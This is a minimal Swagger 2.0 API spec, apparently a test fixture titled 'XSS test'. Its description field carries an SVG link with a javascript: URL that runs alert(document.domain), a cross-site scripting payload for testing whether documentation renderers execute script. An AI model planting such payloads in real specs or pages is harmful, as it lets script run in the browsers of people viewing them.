swagger: "2.0"
info:
  title: "XSS test"
  version: "1.0.0"
  description: |
    <svg><a xlink:href="javascript:alert(document.domain)">Click me</a></svg>
paths:
  /x:
    get:
      responses:
        "200": { description: "OK" }
